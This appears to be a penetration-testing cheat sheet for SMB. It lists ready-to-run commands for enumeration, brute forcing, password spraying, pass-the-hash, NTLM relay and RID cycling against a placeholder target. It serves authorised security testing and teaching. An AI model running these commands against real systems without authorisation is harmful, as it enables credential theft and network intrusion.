SMB Pentesting Notes

Protocol Overview

Basic Information

  • Port: TCP 139 (NetBIOS), TCP 445 (Direct TCP/IP)

  • Protocol Type: Application layer

  • Purpose: File sharing, printer sharing, and remote administration

  • Security: Authentication and ACL-based access control

Protocol Versions

  1. SMB 1.0/CIFS

    • Legacy version, highly vulnerable

    • Used in Windows NT/2000/XP

    • Should be disabled due to security risks

  2. SMB 2.0/2.1

    • Introduced with Windows Vista

    • Improved performance and reliability

    • Better security features

  3. SMB 3.0+

    • Introduced with Windows 8/Server 2012

    • Supports encryption and secure failover

    • Current standard for Windows networks

Initial Enumeration

Port Scanning

# Basic SMB scan
nmap -p139,445 -sV <target>

# Aggressive scan with scripts
nmap -p139,445 -sV -sC -A <target>

# Vulnerability scanning
nmap -p139,445 --script smb-vuln* <target>
# Using SMBClient
smbclient -L //<target> -N

# Using Metasploit
msfconsole -q
use auxiliary/scanner/smb/smb_version

# Using rpcclient
rpcclient -U "" -N <target>

Anonymous/Guest Access

Testing Anonymous Access

# Using smbclient
smbclient -L //<target> -N
smbclient //<target>/share -N

# Using smbmap
smbmap -H <target> -u "guest" -p ""
smbmap -H <target> -u "null" -p ""

# Using CrackMapExec
crackmapexec smb <target> --shares -u "" -p ""

Brute Force Attacks

Using Hydra

# Basic authentication
hydra -l user -P passwords.txt smb://<target>

# Multiple users
hydra -L users.txt -P passwords.txt smb://<target>

Using CrackMapExec

# Password spraying
crackmapexec smb <target> -u users.txt -p password123

# Brute force
crackmapexec smb <target> -u user -p passwords.txt

Using Metasploit

use auxiliary/scanner/smb/smb_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

Common NSE Scripts

# Discovery scripts
nmap -p445 --script smb-protocols <target>
nmap -p445 --script smb-security-mode <target>
nmap -p445 --script smb-enum-shares <target>
nmap -p445 --script smb-enum-users <target>
nmap -p445 --script smb-enum-domains <target>

# Vulnerability scripts
nmap -p445 --script smb-vuln-ms17-010 <target>
nmap -p445 --script smb-vuln-ms08-067 <target>
nmap -p445 --script smb-double-pulsar-backdoor <target>

Share Operations

Listing Shares

# Using smbclient
smbclient -L //<target> -U user

# Using smbmap
smbmap -H <target> -u user -p password

# Using CrackMapExec
crackmapexec smb <target> -u user -p password --shares

Accessing Shares

# Interactive access
smbclient //<target>/share -U user

# Mount share locally
mount -t cifs //<target>/share /mnt/share -o username=user

# Download files
smbget -R smb://<target>/share -U user

RPC Enumeration

Using rpcclient

# Connect
rpcclient -U "" -N <target>

# Common commands
rpcclient $> srvinfo
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> lookupnames admin
rpcclient $> enumprinters

RID Cycling

# Manual RID cycling
for i in $(seq 500 1100); do 
    rpcclient -N -U "" <target> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""
done

# Using impacket
lookupsid.py anonymous@<target>

Advanced Techniques

Pass-the-Hash

# Using CrackMapExec
crackmapexec smb <target> -u Administrator -H "<HASH>"

# Using pth-smbclient
pth-smbclient //<target>/share -U DOMAIN/user%hash

# Using impacket
psexec.py -hashes :<hash> user@<target>

SMB Relay Attacks

# Using Responder
responder -I eth0 -wrfv

# Using ntlmrelayx
ntlmrelayx.py -tf targets.txt -smb2support

Configuration Files

Samba Configuration

  • Main config: /etc/samba/smb.conf

  • Users database: /var/lib/samba/private/passdb.tdb

  • Share definitions: /etc/samba/shares.conf

Windows Configuration

  • Registry: HKLM\System\CurrentControlSet\Services\LanmanServer

  • Group Policy: Computer Configuration\Windows Settings\Security Settings\File System

Common Vulnerabilities

  1. Protocol Vulnerabilities

    • EternalBlue (MS17-010)

    • EternalRomance

    • SMBGhost (CVE-2020-0796)

  2. Configuration Issues

    • Null sessions allowed

    • Guest access enabled

    • Weak share permissions

    • Unencrypted traffic

  3. Authentication Issues

    • Weak passwords

    • Password reuse

    • Clear-text credentials

    • Kerberos misconfiguration

Post-Exploitation

Information Gathering

  • Enumerate domain users and groups

  • Map network shares

  • Identify sensitive files

  • Check for hidden shares

  • Extract system information

Privilege Escalation

  • Check for writeable shares

  • Search for sensitive files

  • Look for stored credentials

  • Test for SeBackupPrivilege

  • Exploit service misconfigurations

Common Status Codes

Code
Meaning

0x00000000

Success

0xC0000022

Access Denied

0xC000006D

Logon Failure

0xC0000203

User Session Deleted

0xC0000224

Password Change Required

Best Practices for Pentesting

  1. Initial Reconnaissance

    • Identify SMB version

    • Check for null sessions

    • Test anonymous access

    • Map available shares

  2. Deep Enumeration

    • Enumerate users and groups

    • Check share permissions

    • Look for sensitive data

    • Test write access

    • Identify vulnerabilities

  3. Documentation

    • Record share listings

    • Document user accounts

    • Note system information

    • Save vulnerability evidence

  4. Risk Assessment

    • Evaluate security posture

    • Assess potential impact

    • Consider attack vectors

    • Prioritize vulnerabilities

  5. Reporting

    • Detail findings

    • Provide remediation steps

    • Include evidence

    • Suggest security improvements

PreviousFTP Pentesting NotesNextSSH Pentesting Notes